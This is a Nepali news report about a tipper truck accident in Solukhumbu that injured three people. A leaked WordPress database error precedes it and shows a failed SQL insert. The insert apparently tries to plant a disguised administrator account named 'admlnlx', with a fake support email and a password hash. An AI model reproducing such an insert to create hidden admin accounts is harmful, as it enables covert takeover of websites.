WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHScddC.Bcfu7q6lfTIUZrihDeiDEN/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:27:02', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । थुलुङ दुधकोशिमा ट्रिफर दुर्घटना हुँदा ३ जना घाइते भएका छन् ।
थुलुङदुधकोशी गाउँपालिका वडा नम्बर ७ रोक्तिमा आज बिहान ४:०० बजे दुर्घटनामा भएको थुलुङ दुधकोकोशी गाउँपालिका प्रबक्ता भोजराज कार्किले बताए ।माप्यदुधकोशी गाउँपालिका र थुलुङदुधकोशी गाउँपालिकाको सिमानामा रहेको त्रिवेणी खोला काँकुमा पुल निर्माणका लागी सिमेन्ट बोकेर गएको टिफर दुर्घटना हुँदा कावासोती नवलपरासीका २७ वर्षिय चालक आभास आचार्य, खप्तड गाउँपालिका-३ मुगुका सहचालक हिरा टमाटा र चन्दनाथ नगरपालिका १० जुम्लाका गनी महत घाइते भएको कार्किले बताए ।
तीनैजना घाइतेहरुलाई उपचारका लागी स्थानीय जनप्रतिनिधी प्रहरी र स्थानीयको मद्दतमा उपचारका लागी जिल्ला अस्पताल फाप्लु पठाइएको कार्कीले बताए । दुर्घटनाको कारण भने खुल्न बाँकी रहेको जिल्ला प्रहरी कार्यालय सोलुखुम्बुले जनाएको छ ।